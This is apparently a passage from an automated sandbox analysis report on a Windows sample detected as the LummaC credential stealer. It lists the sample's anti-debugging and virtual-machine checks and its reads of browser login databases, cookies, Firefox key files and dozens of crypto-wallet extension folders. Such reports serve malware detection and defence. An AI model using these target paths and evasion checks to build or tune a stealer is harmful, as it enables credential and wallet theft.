            Source: C:\Users\user\Desktop\file.exe TID: 7724Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: file.exe, 00000000.00000003.1368377137.0000000005D04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: file.exe, 00000000.00000002.1498844199.00000000014C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: file.exe, 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: file.exe, file.exe, 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441241710.0000000001573000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1499094285.0000000001553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1497593408.000000000154D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: file.exeString found in binary or memory: Jaxx Liberty
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: file.exeString found in binary or memory: ExodusWeb3
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
            Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exeString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
